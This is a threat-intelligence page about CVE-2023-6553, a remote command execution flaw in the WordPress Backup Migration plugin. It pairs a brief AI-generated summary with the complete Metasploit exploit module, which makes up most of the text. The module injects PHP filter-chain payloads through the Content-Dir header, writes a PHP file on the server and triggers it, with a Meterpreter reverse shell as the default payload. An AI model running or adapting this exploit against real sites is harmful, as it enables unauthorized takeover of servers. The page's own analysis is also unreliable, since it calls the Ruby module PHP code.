WordPress Backup Migration 1.3.7 - Remote Command Execution
WordPress Backup Migration 1.3.7 - Remote Command Execution
AI Analysis
Technical Summary
The WordPress Backup Migration plugin version 1.3.7 contains a remote command execution vulnerability. This type of vulnerability enables an attacker to run arbitrary commands on the server hosting the plugin, potentially leading to full system compromise. The exploit code is available in PHP, facilitating exploitation by attackers. There is no information about affected versions beyond 1.3.7 or any official patch or vendor advisory. The plugin is not a cloud service, so remediation depends on the site administrators.
Potential Impact
Successful exploitation could allow attackers to execute arbitrary commands remotely on the affected WordPress server, potentially leading to unauthorized access, data compromise, or full system control. The severity is assessed as medium based on available information.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider disabling or removing the vulnerable plugin to prevent exploitation. Monitor official WordPress plugin repositories and vendor channels for updates.
Indicators of Compromise
- exploit-code: # Exploit Title: WordPress Backup Migration 1.3.7 - Remote Command Execution # Date: 2025-10-26 # Exploit Author: DANG # Vendor Homepage: https://backupbliss.com/ # Software Link: https://wordpress.org/plugins/backup-backup/ # Version: Backup Migration ≤1.3.7 # Tested on: LINUX # CVE : CVE-2023-6553 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HTTP::PhpFilterChain include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Backup Migration Plugin PHP Filter Chain RCE', 'Description' => %q{ This module exploits an unauth RCE in the WordPress plugin: Backup Migration (<= 1.3.7). The vulnerability is exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php endpoint. The exploit makes use of a neat technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversions. This allows an attacker to prepend a PHP payload to a string which gets evaluated by a require statement, which results in command execution. }, 'Author' => [ 'Nex Team', # Vulnerability discovery 'Valentin Lobstein', # PoC 'jheysel-r7' # msfmodule ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-6553'], ['URL', 'https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py'], ['URL', 'https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it'], ['WPVDB', '6a4d0af9-e1cd-4a69-a56c-3c009e207eca'] ], 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, 'Platform' => ['unix', 'linux', 'win', 'php'], 'Arch' => [ARCH_PHP], 'Targets' => [['Automatic', {}]], 'DisclosureDate' => '2023-12-11', 'DefaultTarget' => 0, 'Privileged' => false, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('PAYLOAD_FILENAME', [ true, 'The filename for the payload to be used on the target host (%RAND%.php by default)', Rex::Text.rand_text_alpha(4) + '.php']), ] ) end def check return CheckCode::Unknown unless wordpress_and_online? wp_version = wordpress_version print_status("WordPress Version: #{wp_version}") if wp_version # The plugin's official name seems to be Backup Migration however the package filename is "backup-backup" check_code = check_plugin_version_from_readme('backup-backup', '1.3.8') if check_code.code != 'appears' return CheckCode::Safe end plugin_version = check_code.details[:version] print_good("Detected Backup Migration Plugin version: #{plugin_version}") CheckCode::Appears end def send_payload(payload) php_filter_chain_payload = generate_php_filter_payload(payload) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', 'backup-heart.php'), 'method' => 'POST', 'headers' => { 'Content-Dir' => php_filter_chain_payload } ) fail_with(Failure::Unreachable, 'Connection failed') if res.nil? fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 200 response code') unless res.code == 200 end def write_to_payload_file(string_to_write) # Because the payload is base64 encoded and then each character is translated into it's corresponding php filter chain, # the payload becomes quite large and we start to hit limitations due to the HTTP header size. # For example this payload: "<?php fwrite(fopen("G", "a"),"\x73");?>", ends up being 7721 characters long. # The payload size limit on the target I was testing seemed to be around 8000 characters. # Using the following: <?php file_put_contents("file.php","char",FILE_APPEND);?> (more elegant solution) exceeds the # size limit which is why I ended up using <?php fwrite(fopen("<single_char_filename>", "char" ?> and then after # copying the single_char_filename to a filename with a .php extension to be executed. single_char_filename = Rex::Text.rand_text_alpha(1) string_to_write.each_char do |char| send_payload("<?php fwrite(fopen(\"#{single_char_filename}\",\"a\"),\"#{'\\x' + char.unpack('H2')[0]}\");?>") end register_file_for_cleanup(single_char_filename) send_payload("<?php copy(\"#{single_char_filename}\",\"#{datastore['PAYLOAD_FILENAME']}\");?>") register_file_for_cleanup(datastore['PAYLOAD_FILENAME']) end def trigger_payload_file res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', datastore['PAYLOAD_FILENAME']), 'method' => 'GET' ) print_warning('The application responded to the request to trigger the payload, this is unexpected. Something may have gone wrong.') if res end def exploit print_status('Writing the payload to disk, character by character, please wait...') # Use double quotes in the payload, not single. write_to_payload_file("<?php #{payload.encoded}") trigger_payload_file end end
WordPress Backup Migration 1.3.7 - Remote Command Execution
Description
WordPress Backup Migration 1.3.7 - Remote Command Execution
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The WordPress Backup Migration plugin version 1.3.7 contains a remote command execution vulnerability. This type of vulnerability enables an attacker to run arbitrary commands on the server hosting the plugin, potentially leading to full system compromise. The exploit code is available in PHP, facilitating exploitation by attackers. There is no information about affected versions beyond 1.3.7 or any official patch or vendor advisory. The plugin is not a cloud service, so remediation depends on the site administrators.
Potential Impact
Successful exploitation could allow attackers to execute arbitrary commands remotely on the affected WordPress server, potentially leading to unauthorized access, data compromise, or full system control. The severity is assessed as medium based on available information.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider disabling or removing the vulnerable plugin to prevent exploitation. Monitor official WordPress plugin repositories and vendor channels for updates.
Technical Details
- Edb Id
- 52486
- Has Exploit Code
- true
- Code Language
- php
Indicators of Compromise
Exploit Source Code
Exploit code for WordPress Backup Migration 1.3.7 - Remote Command Execution
# Exploit Title: WordPress Backup Migration 1.3.7 - Remote Command Execution # Date: 2025-10-26 # Exploit Author: DANG # Vendor Homepage: https://backupbliss.com/ # Software Link: https://wordpress.org/plugins/backup-backup/ # Version: Backup Migration ≤1.3.7 # Tested on: LINUX # CVE : CVE-2023-6553 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = Exce... (5310 more characters)
Threat ID: 69a792c9d1a09e29cbc1c305
Added to database: 3/4/2026, 2:02:49 AM
Last enriched: 4/7/2026, 11:03:35 AM
Last updated: 4/18/2026, 1:44:21 PM
Views: 162
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.